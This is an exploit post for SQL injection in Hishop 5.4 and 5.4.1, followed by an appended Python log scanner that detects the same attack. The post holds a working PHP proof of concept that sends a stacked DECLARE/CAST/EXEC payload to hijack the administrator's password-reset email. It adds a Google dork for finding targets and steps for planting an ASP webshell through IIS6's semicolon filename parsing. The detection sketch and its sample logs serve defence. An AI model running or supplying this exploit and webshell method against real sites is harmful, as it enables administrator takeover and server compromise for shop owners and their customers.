Hishop 5.4 & 5.4.1 SQL injection
Source: vfocus.net  Author: Hacker-Fire  Published: 2012-04-09
##################################################
# Exploit Title: [Hishop 5.4 & 5.4.1 SQL injection]
# Date: [06-04-2012]
# Author: [Hacker-Fire]
# Vendor or Software Link: [http://www.hishop.com.cn/bbs/thread-htm-fid-13.html]
# Version: [ 5.4 & 5.4.1 ]
# Category:: [ webapps]
# Google dork: [intext:Hishop 5.4]
# Tested on: [Windows 7 ]
##################################################

[~] P0c [~] :

<?php
print_r('
+-------------------------+
Hishop 5.4 & 5.4.1 SQL injection exploit By: Hacker-Fire
+-------------------------+
');
if ($argc < 3) {
print_r('
+-------------------------+
Usage: php ' . $argv[0] . ' Host Port Path RegMail
Example:
php ' . $argv[0] . ' localhost 80 /SHOES/category-92.aspx?valueStr=35_0 syc@myclover.org
+-------------------------+
');
exit;
}
$host = $argv[1];
$port = $argv[2];
$path = $argv[3];
$mail = $argv[4];
$expdata = "";
for ($i = 0; $i < strlen($mail); $i++)
$expdata = $expdata . dechex(ord($mail[$i])) . "00";
$expdata = strtoupper($expdata);
$expdata = "%27)%20or%201=1;DECLARE%20@S%20NVARCHAR(4000)%20SET%20@S=CAST(" . $expdata . "2700%20AS%20NVARCHAR(4000))%20EXEC(S);-";
GET($host, $port, $path, $expdata, 30);

function GET($host, $port, $path, $data, $timeout, $cookie = '') {
$fp = fsockopen($host, $port, $errno, $errstr, 30);
if (!$fp) {
echo "{$errstr} ({$errno})<br />\n";
exit;
}

$out = "GET $path$data HTTP/1.1\r\n";
$out .= "Host: $host:$port\r\n";
$out .= "Connection: Close\r\n\r\n\r\n";

fwrite($fp, $out);
while (!feof($fp)) {
fgets($fp, 128);
}
fclose($fp);
}

print_r ('
+ ------------------------- +
[+] Get Manager, the Password
[1] to [landing] - "[My Account] -" [personal information】
[2] E-mail the administrator password.
[3] the Good Luck!
+ ------------------------- +
[+] Get the WebShell (the IIS6)
Log in from [1] / admin / [commodity management] - "[Category template set】
[2] the upload 1.asp;. Html
[3] the Shell Address: http://127.0.0.1/Themes/default/zh-cn/categorythemes/1.asp;. Html
+ ------------------------- +
');
?>
##########################################################
[»] Greetz to :
                    
[ TrOon,Aghilas,r00t_dz,EliteTorjan,Vaga-hacker,xConsole,OverDz ]
[ & -> Th3 Viper,BriscO-Dz,LaMiN Dk, xV!rus , black hool ]            
[ And all my Friends + Algerian Hackers ]
      
##########################################################
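
A detection sketch for the two traces this PoC leaves in IIS W3C logs: the stacked DECLARE/CAST/EXEC query string and a request path with a script extension followed by ";" (as in 1.asp;.html). This is an added example, not part of the original post; the log lines, their field order and the function name scan_iis_log are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Stacked T-SQL smuggled in a query string: DECLARE @x ... CAST( ... EXEC(
STACKED_SQL = re.compile(r"declare\s+@\w+.*cast\s*\(.*exec\s*\(", re.I | re.S)
# IIS 6 runs "name.asp;.html" as ASP, so flag a script extension followed by ';'
SEMICOLON_EXT = re.compile(r"\.(asp|asa|cer|cdx)\s*;", re.I)

def scan_iis_log(lines):
    """Return (line_no, client_ip, reason) for each suspicious W3C log entry."""
    fields, hits = [], []
    for no, line in enumerate(lines, 1):
        if line.startswith("#Fields:"):
            fields = line.split()[1:]      # column names for the rows that follow
            continue
        if line.startswith("#") or not line.strip() or not fields:
            continue
        rec = dict(zip(fields, line.split()))
        raw_query = rec.get("cs-uri-query", "").replace("+", " ")
        # Decode twice so double-encoded payloads (%2527) are normalized too
        query = unquote(unquote(raw_query))
        stem = unquote(rec.get("cs-uri-stem", ""))
        ip = rec.get("c-ip", "-")
        if STACKED_SQL.search(query):
            hits.append((no, ip, "stacked DECLARE/CAST/EXEC in query string"))
        if SEMICOLON_EXT.search(stem):
            hits.append((no, ip, "script extension followed by ';' in path"))
    return hits

# Constructed sample log (documentation IP ranges, inert hex value)
SAMPLE_LOG = [
    "#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status",
    "2012-04-06 10:00:01 GET /SHOES/category-92.aspx valueStr=35_0 192.0.2.10 200",
    "2012-04-06 10:00:07 GET /SHOES/category-92.aspx "
    "valueStr=35_0%27)%20or%201=1;DECLARE%20@S%20NVARCHAR(4000)%20SET%20@S="
    "CAST(41002700%20AS%20NVARCHAR(4000))%20EXEC(S);- 198.51.100.7 500",
    "2012-04-06 10:03:12 GET /Themes/default/zh-cn/categorythemes/1.asp;.html"
    " - 198.51.100.7 200",
]

if __name__ == "__main__":
    for hit in scan_iis_log(SAMPLE_LOG):
        print(hit)
```

Both hits share a client IP in the sample, which is the correlation worth alerting on: an injection attempt followed by a request for a semicolon-named file under the theme directory.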

 